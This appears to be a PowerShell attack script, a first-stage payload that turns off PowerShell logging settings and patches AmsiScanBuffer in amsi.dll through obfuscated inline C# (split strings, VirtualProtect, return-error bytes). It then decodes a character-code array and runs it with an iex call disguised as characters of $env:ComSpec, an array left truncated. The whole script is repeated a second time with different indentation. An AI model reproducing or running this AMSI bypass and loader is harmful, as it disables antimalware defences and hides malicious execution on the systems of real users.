jdferrell3/logfile-first-payload.ps1

## logfile-first-payload.ps1
$LogEngineLifeCycleEvent=$LogEngineHealthEvent=$LogProviderLifecycleEvent=$LogProviderHealthEvent=$False;
Function jpnm {
    sal bifsynume Add-Type ;
if ($($PSVersionTable.PSVersion.Major) -ge 3){$e = 'CSharp'}else{$e = 'CSharpVersion3'}
    bifsynume @"
using System;
using System.Runtime.InteropServices;

public class tqjn
{
    [DllImport("kernel32", EntryPoint = "GetProcAddress")]
    static extern IntPtr atrzq(IntPtr hModule, string procName);

    [DllImport("kernel32", EntryPoint = "LoadLibrary")]
    static extern IntPtr hesadw(string name);

    [DllImport("kernel32", EntryPoint = "VirtualProtect")]
    static extern bool yarsmcv(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

    # AMSI bypass
    static byte[] dae67 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
    static byte[] zsc56 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };

    public static void vxbiwrol()
    {
        if (khbfyc45())
            Patchtqjn(dae67);
        else
            Patchtqjn(zsc56);
    }

    // patches AMSI
    private static void Patchtqjn(byte[] qpdkm45)
    {
        try
        {
            var one = "i.d";
            var fto4 = "a";
            var boo = "ll";
            var kxcx4 = "ms";
            var djrhbt4 = hesadw(fto4 + kxcx4 + one + boo);
            if (djrhbt4 == IntPtr.Zero)
            {
                return;
            }

            var urgmq3 = "nBuf";
            var ltxpdot4 = "Am";
            var yua29 = "s";
            var odv35 = "fer";
            var ish46 = "iSca";
            var peqr49 = atrzq(djrhbt4, ltxpdot4 + yua29 + ish46 + urgmq3 + odv35);
            if (peqr49 == IntPtr.Zero)
            {
                return;
            }

            uint oldProtect;
            yarsmcv(peqr49, (UIntPtr)qpdkm45.Length, 0x40, out oldProtect);

            Marshal.Copy(qpdkm45, 0, peqr49, qpdkm45.Length);
        }
        catch (Exception e)
        {
            Console.WriteLine(" [x] {0}", e.Message);
            Console.WriteLine(" [x] {0}", e.InnerException);
        }
    }

    private static bool khbfyc45()
    {
        bool khbfyc45 = true;

        if (IntPtr.Size == 4)
            khbfyc45 = false;

        return khbfyc45;
    }
}
"@  -Language $e
$ptr = [tqjn]::vxbiwrol()
}
if ($PSVersionTable.CLRVersion.Major -gt 3) {jpnm}

# second payload, shortened for space
 (( 48 ,46 , 46 , ... ,125 ) |fOrEAch-OBJeCt{( [Int] $_-AS[ChaR])} ) -Join''| . ( $eNv:cOmspEc[4,26,25]-jOin'')
	$LogEngineLifeCycleEvent=$LogEngineHealthEvent=$LogProviderLifecycleEvent=$LogProviderHealthEvent=$False;
	Function jpnm {
	sal bifsynume Add-Type ;
	if ($($PSVersionTable.PSVersion.Major) -ge 3){$e = 'CSharp'}else{$e = 'CSharpVersion3'}
	bifsynume @"
	using System;
	using System.Runtime.InteropServices;

	public class tqjn
	{
	[DllImport("kernel32", EntryPoint = "GetProcAddress")]
	static extern IntPtr atrzq(IntPtr hModule, string procName);

	[DllImport("kernel32", EntryPoint = "LoadLibrary")]
	static extern IntPtr hesadw(string name);

	[DllImport("kernel32", EntryPoint = "VirtualProtect")]
	static extern bool yarsmcv(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

	# AMSI bypass
	static byte[] dae67 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
	static byte[] zsc56 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };

	public static void vxbiwrol()
	{
	if (khbfyc45())
	Patchtqjn(dae67);
	else
	Patchtqjn(zsc56);
	}

	// patches AMSI
	private static void Patchtqjn(byte[] qpdkm45)
	{
	try
	{
	var one = "i.d";
	var fto4 = "a";
	var boo = "ll";
	var kxcx4 = "ms";
	var djrhbt4 = hesadw(fto4 + kxcx4 + one + boo);
	if (djrhbt4 == IntPtr.Zero)
	{
	return;
	}

	var urgmq3 = "nBuf";
	var ltxpdot4 = "Am";
	var yua29 = "s";
	var odv35 = "fer";
	var ish46 = "iSca";
	var peqr49 = atrzq(djrhbt4, ltxpdot4 + yua29 + ish46 + urgmq3 + odv35);
	if (peqr49 == IntPtr.Zero)
	{
	return;
	}

	uint oldProtect;
	yarsmcv(peqr49, (UIntPtr)qpdkm45.Length, 0x40, out oldProtect);

	Marshal.Copy(qpdkm45, 0, peqr49, qpdkm45.Length);
	}
	catch (Exception e)
	{
	Console.WriteLine(" [x] {0}", e.Message);
	Console.WriteLine(" [x] {0}", e.InnerException);
	}
	}

	private static bool khbfyc45()
	{
	bool khbfyc45 = true;

	if (IntPtr.Size == 4)
	khbfyc45 = false;

	return khbfyc45;
	}
	}
	"@ -Language $e
	$ptr = [tqjn]::vxbiwrol()
	}
	if ($PSVersionTable.CLRVersion.Major -gt 3) {jpnm}

	# second payload, shortened for space
	(( 48 ,46 , 46 , ... ,125 ) \|fOrEAch-OBJeCt{( [Int] $_-AS[ChaR])} ) -Join''\| . ( $eNv:cOmspEc[4,26,25]-jOin'')